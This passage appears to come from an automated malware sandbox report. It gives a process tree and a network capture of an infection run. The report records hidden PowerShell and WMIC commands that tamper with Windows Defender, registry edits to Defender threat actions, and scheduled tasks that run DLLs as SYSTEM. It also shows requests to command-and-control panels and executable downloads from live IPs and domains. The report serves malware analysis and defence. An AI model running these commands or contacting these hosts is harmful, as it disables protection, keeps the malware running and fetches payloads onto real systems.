C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:2240
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:2112
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2040
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
PID:1788 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵PID:3248
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2752
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2508
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
PID:3952 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵PID:2732
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\RfUCrj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F3⤵
- Creates scheduled task(s)
PID:2940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\ToNBcil.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:4064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FPieTEPPuEmJrhC"3⤵PID:3468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPieTEPPuEmJrhC"3⤵PID:1976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\ehwUbKI.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\EReGVRO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\KrqjkyL.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\TPCHQcQ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 11:20:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\avxAmfjK\TYRvZiQ.dll\",#1 /wZodidZA 385118" /V1 /F3⤵
- Creates scheduled task(s)
PID:2360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "rrqYunoktxOQmCoCX"3⤵PID:3020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"3⤵PID:2760
-
-
-
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\lKdXuMn.exeC:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\lKdXuMn.exe GH /nIqNdidXA 385118 /S2⤵PID:1656
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:3792
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:3980
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1568
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1276
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:3112
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2720
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2596
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:3872
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1052
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2484
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:3456
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2764
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:1996
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2548
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2136
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
PID:4092 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2472
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"3⤵PID:1620
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:1692
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:2256
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2304
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
PID:2828 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵PID:2484
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2196
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:804
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
PID:1492 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵PID:3008
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\uEnpwG.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F3⤵
- Creates scheduled task(s)
PID:2096
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\CZHgcYp.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FPieTEPPuEmJrhC"3⤵PID:3436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPieTEPPuEmJrhC"3⤵PID:2080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\SkXVwIm.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\EoFBZhP.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:944
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\bYOwNNG.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\ecbOcLL.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"3⤵PID:2828
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\avxAmfjK\TYRvZiQ.dll",#1 /wZodidZA 3851182⤵PID:1560
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\avxAmfjK\TYRvZiQ.dll",#1 /wZodidZA 3851183⤵PID:3812
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"4⤵PID:2504
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3668
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1056
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2980
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "600298293-43086648706781016-813251597-1160883711-1796718265-213712765917956893"1⤵PID:3236
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1480860119-15148007571026574562513868101-1343811443-326228311-12394313081701625990"1⤵PID:268
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1413259802-104990721176658927718753677971159039460-864429962-1315484792-1952776582"1⤵PID:3080
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2865713671797879831-93505382-84000086-972935384-1276965024-5601966121872202003"1⤵PID:3272
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:4064
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:2380
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5401⤵PID:240
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:924
Network
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:47:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:47:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:47:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.56:80RequestGET /cost/sarra.exe HTTP/1.1
Host: 193.233.132.56
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:47:01 GMT
Content-Type: application/octet-stream
Content-Length: 2399232
Last-Modified: Sun, 05 May 2024 21:21:56 GMT
Connection: keep-alive
ETag: "6637f874-249c00"
Accept-Ranges: bytes
-
Remote address:193.233.132.56:80RequestGET /mine/amert.exe HTTP/1.1
Host: 193.233.132.56
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:47:28 GMT
Content-Type: application/octet-stream
Content-Length: 1870336
Last-Modified: Sun, 05 May 2024 21:23:13 GMT
Connection: keep-alive
ETag: "6637f8c1-1c8a00"
Accept-Ranges: bytes
-
Remote address:193.233.132.56:80RequestPOST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:47:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:193.233.132.56:80RequestPOST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:47:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.56:80RequestGET /lend/swiiiii.exe HTTP/1.1
Host: 193.233.132.56
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:47:33 GMT
Content-Type: application/octet-stream
Content-Length: 329352
Last-Modified: Sat, 30 Mar 2024 23:24:22 GMT
Connection: keep-alive
ETag: "66089f26-50688"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Responseconsent.youtube.comIN A142.250.180.14
-
GEThttps://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1chrome.exeRemote address:142.250.180.14:443RequestGET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
host: consent.youtube.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-ch-ua: "Chromium";v="106", "Google Chrome";v="106", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "0.1.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Chromium";v="106.0.5249.119", "Google Chrome";v="106.0.5249.119", "Not;A=Brand";v="99.0.0.0"
x-client-data: CPCPywE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: SOCS=CAAaBgiAmNuxBg
cookie: YSC=TI4ZKJXkq5M
cookie: __Secure-YEC=CgtzR1ZudDdoZUEtZyiKmeCxBjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
-
Remote address:172.67.19.24:443RequestGET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 1771
Last-Modified: Sun, 05 May 2024 22:18:11 GMT
Server: cloudflare
CF-RAY: 87f4461878089472-LHR
-
Remote address:172.67.169.89:443RequestGET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
memory: 0.36199188232421875
expires: Sun, 05 May 2024 22:47:42 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Sun, 05 May 2024 22:28:21 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W6Egw4SCP3b30Z6vAyuXD9ixszPXRjani7DSqrIqzkxTpmaK5fILegiJhiFky3ccKViVxPgGe6%2F5V0kXAUybxCXoMYeKkkNzsAke1u8Z64EUmZ46MW2DYJA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f446187bf276b9-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:185.172.128.59:80RequestGET /ISetup5.exe HTTP/1.1
Host: 185.172.128.59
Connection: Keep-Alive
-
Remote address:8.8.8.8:53Requestonlycitylink.comIN AResponseonlycitylink.comIN A104.21.18.166onlycitylink.comIN A172.67.182.192
-
Remote address:8.8.8.8:53Requestrealdeepai.orgIN AResponserealdeepai.orgIN A104.21.90.14realdeepai.orgIN A172.67.193.79
-
Remote address:8.8.8.8:53Requestnic-it.nlIN A
-
Remote address:8.8.8.8:53Requestonlycitylink.comIN AResponseonlycitylink.comIN A104.21.18.166onlycitylink.comIN A172.67.182.192
-
Remote address:8.8.8.8:53Requestrealdeepai.orgIN A
-
Remote address:185.172.128.228:80ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
RequestGET /ping.php?substr=five HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
-
Remote address:185.172.128.150:80ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "a7550-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
-
Remote address:31.41.44.147:80ResponseHTTP/1.1 404 Not Found
Date: Sun, 05 May 2024 22:48:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
RequestPOST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vdtgftahwqmgp.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 164
Host: trad-einmyus.com
-
Remote address:31.41.44.147:80RequestPOST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://heuynnccyjhoiek.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 274
Host: trad-einmyus.com
ResponseHTTP/1.1 404 Not Found
Date: Sun, 05 May 2024 22:48:19 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
-
Remote address:31.41.44.147:80RequestPOST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jjictnjecoal.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 123
Host: trad-einmyus.com
ResponseHTTP/1.1 404 Not Found
Date: Sun, 05 May 2024 22:48:20 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
-
Remote address:31.41.44.147:80RequestPOST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://icfjwjcolke.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 205
Host: trad-einmyus.com
ResponseHTTP/1.1 404 Not Found
Date: Sun, 05 May 2024 22:48:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
-
Remote address:8.8.8.8:53Requestsvc.iolo.comIN AResponsesvc.iolo.comIN A20.157.87.45
-
Remote address:20.157.87.45:80RequestPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
-
Remote address:31.41.44.147:80RequestPOST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://npcgpytkprfgvbi.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 266
Host: trad-einmyus.com
-
Remote address:31.41.44.147:80RequestPOST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://msupibxwggu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 154
Host: trad-einmyus.com
ResponseHTTP/1.1 404 Not Found
Date: Sun, 05 May 2024 22:48:23 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
-
Remote address:8.8.8.8:53Requestsdfjhuz.comIN AResponsesdfjhuz.comIN A179.27.75.59sdfjhuz.comIN A175.138.146.92sdfjhuz.comIN A220.82.134.210sdfjhuz.comIN A189.134.113.103sdfjhuz.comIN A201.119.119.93sdfjhuz.comIN A186.13.17.220sdfjhuz.comIN A46.100.50.5sdfjhuz.comIN A187.211.162.229sdfjhuz.comIN A211.171.233.129sdfjhuz.comIN A217.219.131.81
-
Remote address:185.172.128.228:80RequestGET /BroomSetup.exe HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
ETag: "4a4030-613b1bf118700"
Accept-Ranges: bytes
Content-Length: 4866096
Content-Type: application/x-msdos-program
-
Remote address:179.27.75.59:80RequestGET /dl/buildz.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sdfjhuz.com
-
Remote address:8.8.8.8:53Requesttrad-einmyus.comIN AResponsetrad-einmyus.comIN A31.41.44.147
-
Remote address:31.41.44.147:80RequestPOST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dlsnkpubkcehb.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 291
Host: trad-einmyus.com
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:48:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close
-
Remote address:31.41.44.147:80RequestPOST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://axjktfheurjryn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 274
Host: trad-einmyus.com
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:48:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close
-
